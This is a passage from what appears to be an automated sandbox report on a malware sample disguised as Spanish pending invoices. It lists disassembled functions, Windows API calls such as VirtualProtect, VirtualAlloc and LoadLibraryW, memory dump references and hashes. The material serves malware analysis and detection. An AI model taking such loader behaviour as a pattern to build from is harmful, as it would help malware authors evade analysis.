                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                  • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                  • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                  • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                  Function 00402AF5 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402B11
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: e18c58a2aa738140e54549e427365221eafe551e17cff140cde306a09a17fb3e
                                  • Instruction ID: b4aa691efdd76b97e29f232bcdca97d183a91086d161f739a0adeab6622ebcbf
                                  • Opcode Fuzzy Hash: e18c58a2aa738140e54549e427365221eafe551e17cff140cde306a09a17fb3e
                                  • Instruction Fuzzy Hash: F8E04F726452006FE610AB51ED8AD7FB71CEB81319F14483FF544A40C1C67E6855966A
                                  Function 00406923 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040693A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                  • Instruction ID: 2742144f5a26ad2eb6f685a055c8babc8a1130b1cd91e66bb9562d29751e6569
                                  • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                  • Instruction Fuzzy Hash: 7CE0BF72200119BB8F215B46DD04D9FBF6DEE956A47114026B905A6150D670EA11D6E4
                                  Function 004069E6 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,004149C0,00403323,?,004149C0,?,004149C0,?,00000004), ref: 004069FD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                  • Instruction ID: 9dc68c0638fdc05cdedacbb3ce278f0548e4c11d63521e27f6831e75186a9fb8
                                  • Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                  • Instruction Fuzzy Hash: 78E0BF32600159BB9F206F96DD04D9FFF6DEE927A47124026B905A2150D670EA11DBE4
                                  Function 00406280 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                  • Instruction ID: b0a4c2d15b2ea223642b35464fd2bd164e57500baa871115652c712219d0a331
                                  • Opcode Fuzzy Hash: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                  • Instruction Fuzzy Hash: 2FE0BF72050209BEEF055F50DD0AD7B371DEB58310F01452EB90695151E6B5A9306634
                                  Function 73471A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualProtect.KERNELBASE(7347501C,00000004,00000040,73475034), ref: 73471A68
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: 4491d336aae922ec36a568694b3af806b5a485d77a8372348b500401023ea6da
                                  • Instruction ID: f47ca9ea5776894839b354e3829dcfd1b7b3534d653d14c58bbeaf0c54286af9
                                  • Opcode Fuzzy Hash: 4491d336aae922ec36a568694b3af806b5a485d77a8372348b500401023ea6da
                                  • Instruction Fuzzy Hash: 8BF022F2E593C0DAD32CAF2AA5447097BE0B719355B2045AEF69DEE381D37041019B9E
                                  Function 004062B3 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,00406980,00000800,?,?,?,Call,00000000,00000000), ref: 004062D7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                  • Instruction ID: a9f46a368aaeb036b72fdcd0ca7d488aed4e3e02bd852bac4dcbc1d9cb67b826
                                  • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                  • Instruction Fuzzy Hash: 4AD0173204020DBBDF11AF90EE01FAB3B2DBB08350F11482AFE06A51A0D776D530AB28
                                  Function 004054C3 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(0001047A,00000000,00000000,00000000), ref: 004054D5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 8966e46b3975f2e1c16f9867a4bf07e8db3346cd8fc1914bcd432734a71edc09
                                  • Instruction ID: 3e6f8704fad9210af6eeac90bfa5cfee8a7ec38ce607d6f75afee67e22a823f2
                                  • Opcode Fuzzy Hash: 8966e46b3975f2e1c16f9867a4bf07e8db3346cd8fc1914bcd432734a71edc09
                                  • Instruction Fuzzy Hash: 68C04C717416407AEA209B619D05F077754A750701F11C8397240E51E0CB74E450DA2C
                                  Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                  • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                  • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                  • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                  Function 004054DE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000028,?,?,00405313), ref: 004054EC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 9aa02c774ae0962c5acd4825ba0c1cef62293177251d585e3810513b907da834
                                  • Instruction ID: c497e426ea7075a905a985053a922d02012b07db19d19f6086ec7a715a02fc42
                                  • Opcode Fuzzy Hash: 9aa02c774ae0962c5acd4825ba0c1cef62293177251d585e3810513b907da834
                                  • Instruction Fuzzy Hash: F7B09235286601AAEA215B00DE09F4A7B62E7A4701F018439B241640B4CFF200A1DB18
                                  Function 73472D14 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNELBASE(?), ref: 73472DD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: b7e9fd4b36f8e280b9a07b715e4de0d2a72fbb983709d6d07dc705517d3fa083
                                  • Instruction ID: 7fc9961e8a3e941f44485d0d43d6a024569e27381d620f160d7d0378198e9cbc
                                  • Opcode Fuzzy Hash: b7e9fd4b36f8e280b9a07b715e4de0d2a72fbb983709d6d07dc705517d3fa083
                                  • Instruction Fuzzy Hash: 2A418DB2800348DFEB1CAFA1DA85BC937F9EB48354F3444AEE509EE250D6349581CBD9

                                  Non-executed Functions

                                  Function 004043F9 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 576windowmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDlgItem.USER32(?,000003F9), ref: 00404411
                                  • GetDlgItem.USER32(?,00000408), ref: 0040441D
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404465
                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 0040447E
                                  • SetWindowLongW.USER32(00000000,000000FC,Function_000058AB), ref: 00404495
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044AB
                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044BD
                                  • SendMessageW.USER32(00000000,00001109,00000002), ref: 004044D0
                                  • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 004044DC
                                  • SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 004044EE
                                  • DeleteObject.GDI32(00000000), ref: 004044F1
                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040451F
                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404529
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004045D4
                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 004045FE
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404614
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404643
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404650
                                  • ShowWindow.USER32(?,00000005), ref: 00404664
                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047A1
                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040481C
                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483B
                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404867
                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040489C
                                  • ImageList_Destroy.COMCTL32(00000000), ref: 004048C3
                                  • GlobalFree.KERNEL32(00000000), ref: 004048D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                  • String ID: M
                                  • API String ID: 1688767230-3664761504
                                  • Opcode ID: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                  • Instruction ID: 6b9816283df2d563a6f6303754403db0efd655586b529c1e8cba48373a45e4bc
                                  • Opcode Fuzzy Hash: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                  • Instruction Fuzzy Hash: 4F12D0B1644301AFD3249F24DC45A2BB7E9EBC8314F10493EFA95E72E1DB789C428B59
                                  Function 00404060 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 281COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDlgItem.USER32(?,000003FB), ref: 004040B1
                                  • SetWindowTextW.USER32(00000000,?), ref: 004040DB
                                    • Part of subcall function 00406A15: GetDlgItemTextW.USER32(?,?,00000400,00404F27), ref: 00406A28
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                    • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Char$Next$ItemText$PrevWindow
                                  • String ID: A$C:\Users\user\AppData\Local\Temp\fanin$Call
                                  • API String ID: 4089110348-2013591467
                                  • Opcode ID: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                  • Instruction ID: 90192ee12d8343b5cbbbf9dcfc6b809e920884bf694149bd8a4c84d13eeda86d
                                  • Opcode Fuzzy Hash: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                  • Instruction Fuzzy Hash: E391B1B1704311ABD720AFA6DD81A6B76A8AF84704F40043FFB45B62D1DB7CD9418B6E
                                  Function 73472351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 734712F8: GlobalAlloc.KERNEL32(00000040,?,734711C4,-000000A0), ref: 73471302
                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 7347294E
                                  • lstrcpyW.KERNEL32(00000008,?), ref: 734729A4
                                  • lstrcpyW.KERNEL32(00000808,?), ref: 734729AF
                                  • GlobalFree.KERNEL32(00000000), ref: 734729C0
                                  • GlobalFree.KERNEL32(?), ref: 73472A44
                                  • GlobalFree.KERNEL32(?), ref: 73472A4A
                                  • GlobalFree.KERNEL32(?), ref: 73472A50
                                  • GetModuleHandleW.KERNEL32(00000008), ref: 73472B1A
                                  • LoadLibraryW.KERNEL32(00000008), ref: 73472B2B
                                  • GetProcAddress.KERNEL32(?,?), ref: 73472B82
                                  • lstrlenW.KERNEL32(00000808), ref: 73472B9D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
